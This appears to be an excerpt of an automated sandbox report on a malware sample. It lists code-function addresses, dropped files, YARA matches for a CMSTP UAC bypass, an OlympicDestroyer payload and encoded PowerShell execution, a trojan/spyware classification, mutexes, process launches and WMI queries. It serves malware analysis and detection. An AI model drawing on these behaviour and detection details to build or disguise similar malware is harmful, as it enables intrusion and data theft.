Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B2FFBB	16_2_06B2FFBB
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B197A5	16_2_06B197A5
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B067AB	16_2_06B067AB
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B1D79A	16_2_06B1D79A
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF779B	16_2_06AF779B
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B1A787	16_2_06B1A787
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF0797	16_2_06AF0797
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B00FF5	16_2_06B00FF5
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AFB7FD	16_2_06AFB7FD
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AFAFF1	16_2_06AFAFF1
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B2F7D4	16_2_06B2F7D4
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B2EFC0	16_2_06B2EFC0
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B0873D	16_2_06B0873D
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B25723	16_2_06B25723
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B08F13	16_2_06B08F13
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B11F17	16_2_06B11F17
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B34715	16_2_06B34715
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B34F06	16_2_06B34F06
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B33705	16_2_06B33705
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B25F7A	16_2_06B25F7A
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AFF764	16_2_06AFF764
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AFE778	16_2_06AFE778
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B1CF53	16_2_06B1CF53
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B07F41	16_2_06B07F41
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B0F4A9	16_2_06B0F4A9
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AFBC87	16_2_06AFBC87
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B3048E	16_2_06B3048E
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF74CF	16_2_06AF74CF
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B14CD5	16_2_06B14CD5
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AECCCB	16_2_06AECCCB
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B02431	16_2_06B02431
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B26C39	16_2_06B26C39
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B15427	16_2_06B15427
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B3AC0F	16_2_06B3AC0F
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B17C0C	16_2_06B17C0C
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B01478	16_2_06B01478
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B1744C	16_2_06B1744C
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B30C4C	16_2_06B30C4C
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B1EDB3	16_2_06B1EDB3
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B21DA6	16_2_06B21DA6
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF7DB4	16_2_06AF7DB4
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF8594	16_2_06AF8594
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B2858E	16_2_06B2858E
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B035F2	16_2_06B035F2
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B0C5FC	16_2_06B0C5FC
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B15DFC	16_2_06B15DFC
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B0EDED	16_2_06B0EDED
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B0CDD7	16_2_06B0CDD7
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B0FDC2	16_2_06B0FDC2
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B29511	16_2_06B29511
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B1E51C	16_2_06B1E51C
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B3B503	16_2_06B3B503
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF6D14	16_2_06AF6D14
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B39D62	16_2_06B39D62
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF955C	16_2_06AF955C
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B18AB2	16_2_06B18AB2
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B252BB	16_2_06B252BB
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B1B2A6	16_2_06B1B2A6
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B32294	16_2_06B32294
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B2A284	16_2_06B2A284
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B34AF2	16_2_06B34AF2
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B10AF6	16_2_06B10AF6
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B36AF4	16_2_06B36AF4
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B372EB	16_2_06B372EB
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B1AAD0	16_2_06B1AAD0
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B37ACB	16_2_06B37ACB
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B292C9	16_2_06B292C9
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B12238	16_2_06B12238
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B0B214	16_2_06B0B214
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B1E214	16_2_06B1E214
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B0F218	16_2_06B0F218
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B13A1F	16_2_06B13A1F
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B1F200	16_2_06B1F200
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B11A05	16_2_06B11A05
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF8A18	16_2_06AF8A18
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B03270	16_2_06B03270
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B05A7C	16_2_06B05A7C
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B1A268	16_2_06B1A268
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B03A55	16_2_06B03A55
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B00259	16_2_06B00259
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B3624A	16_2_06B3624A
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF9253	16_2_06AF9253
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B2B24D	16_2_06B2B24D
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B273B2	16_2_06B273B2
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B0A3B4	16_2_06B0A3B4
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B20B98	16_2_06B20B98
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B38B81	16_2_06B38B81
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B12B8B	16_2_06B12B8B
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B393F2	16_2_06B393F2
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B203F0	16_2_06B203F0
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B23BE6	16_2_06B23BE6
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B2ABE8	16_2_06B2ABE8
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B233D0	16_2_06B233D0
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B3A3D0	16_2_06B3A3D0
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B083C5	16_2_06B083C5
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B1C3CC	16_2_06B1C3CC
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B2DB31	16_2_06B2DB31
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AFAB27	16_2_06AFAB27
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B25B3F	16_2_06B25B3F
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AFF33E	16_2_06AFF33E
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B0E327	16_2_06B0E327
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B1631A	16_2_06B1631A
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B3531C	16_2_06B3531C
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B2C307	16_2_06B2C307
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B2EB04	16_2_06B2EB04
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B1D377	16_2_06B1D377
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B19B76	16_2_06B19B76
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B33B67	16_2_06B33B67
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B08B6C	16_2_06B08B6C
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B26351	16_2_06B26351
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B1FB56	16_2_06B1FB56
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B2835B	16_2_06B2835B
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B18345	16_2_06B18345
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AFEB51	16_2_06AFEB51
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B3B8BA	16_2_06B3B8BA
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B090A0	16_2_06B090A0
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B240A3	16_2_06B240A3
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B018A3	16_2_06B018A3
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B2189B	16_2_06B2189B
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B2989E	16_2_06B2989E
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B1809F	16_2_06B1809F
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B1488F	16_2_06B1488F
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B280F7	16_2_06B280F7
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B310F8	16_2_06B310F8
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B168FE	16_2_06B168FE
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B388E5	16_2_06B388E5
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B100EF	16_2_06B100EF
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AFC0CA	16_2_06AFC0CA
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF88C9	16_2_06AF88C9
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B390C7	16_2_06B390C7
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B23835	16_2_06B23835
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF8024	16_2_06AF8024
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B2203E	16_2_06B2203E
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B15829	16_2_06B15829
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B2082E	16_2_06B2082E
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B0A82F	16_2_06B0A82F
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B26815	16_2_06B26815
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B0201B	16_2_06B0201B
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B1181D	16_2_06B1181D
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B2707E	16_2_06B2707E
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B3A862	16_2_06B3A862
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AFD048	16_2_06AFD048
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B33048	16_2_06B33048
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B279B6	16_2_06B279B6
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B449BD	16_2_06B449BD
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B0F983	16_2_06B0F983
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B179F2	16_2_06B179F2
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF81F4	16_2_06AF81F4
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF712B	16_2_06AF712B
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AF7928	16_2_06AF7928
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B3B126	16_2_06B3B126
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B0592D	16_2_06B0592D
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B3490C	16_2_06B3490C
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06AFE14F	16_2_06AFE14F
Source: C:\Users\user\AppData\Local\Temp\1013372001\c92938c010.exe	Code function: 16_2_06B3994A	16_2_06B3994A

Source: Joe Sandbox View

Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 00FF80C0 appears 130 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0096DF80 appears 81 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 009680C0 appears 393 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00988E10 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0096D663 appears 40 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0096D942 appears 84 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 00967A00 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: String function: 0096D64E appears 79 times

Source: nss3[1].dll.17.dr	Static PE information: No import functions for PE file found
Source: nss3.dll.17.dr	Static PE information: No import functions for PE file found

Source: nss3[1].dll.17.dr	Static PE information: Data appended to the last section found
Source: nss3.dll.17.dr	Static PE information: Data appended to the last section found

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 40.0.downloaded_file.exe.cd0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 40.2.downloaded_file.exe.a2df98.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 44.2.explorer.exe.ab0000.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 37.2.powershell.exe.27fe82da4b0.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 40.2.downloaded_file.exe.cd0000.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 40.2.downloaded_file.exe.a2df98.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 37.2.powershell.exe.27fe83582f8.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 37.2.powershell.exe.27fe83582f8.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 37.2.powershell.exe.27fe82da4b0.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
Source: 49.2.explorer.exe.2750000.0.unpack, type: UNPACKEDPE	Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: Process Memory Space: powershell.exe PID: 2188, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe, type: DROPPED	Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)

Source: random[1].exe0.6.dr	Static PE information: Section: ZLIB complexity 0.9973440203287197
Source: random[1].exe0.6.dr	Static PE information: Section: izjfeliq ZLIB complexity 0.9944781656703995
Source: c92938c010.exe.6.dr	Static PE information: Section: ZLIB complexity 0.9973440203287197
Source: c92938c010.exe.6.dr	Static PE information: Section: izjfeliq ZLIB complexity 0.9944781656703995
Source: random[1].exe1.6.dr	Static PE information: Section: pjdaqopi ZLIB complexity 0.9949373807251909
Source: 2bd330404c.exe.6.dr	Static PE information: Section: pjdaqopi ZLIB complexity 0.9949373807251909

Source: random[1].exe.6.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: 6dce78ba2b.exe.6.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.expl.evad.winEXE@78/58@24/14

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\4ZAAIhb[1].exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1013375001\6dce78ba2b.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6280:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Mutant created: \Sessions\1\BaseNamedObjects\{7E105FD4-6112-4FB9-A722-91E984087449}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7556:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Mutant created: \Sessions\1\BaseNamedObjects\{16875766-AD57-416F-8330-F0B6BCC3AFF1}
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Mutant created: \Sessions\1\BaseNamedObjects\{D3378A42-4880-48C8-9826-A27CECC41889}
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7676:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5184:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4088:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1716:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Mutant created: \Sessions\1\BaseNamedObjects\{8FE2C78C-5E69-438F-A4AB-0D2F0B3439E1}
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8052:120:WilError_03

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\D6C.tmp\D6D.tmp\D6E.bat C:\Users\user\AppData\Local\Temp\1013367001\4ZAAIhb.exe"

Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe
Source: C:\Users\user\AppData\Local\Temp\downloaded_file.exe	Process created: C:\Windows\explorer.exe
Source: C:\Windows\explorer.exe	Process created: C:\Windows\explorer.exe

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Users\user\AppData\Local\Temp\1013374001\b5c7128cd0.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

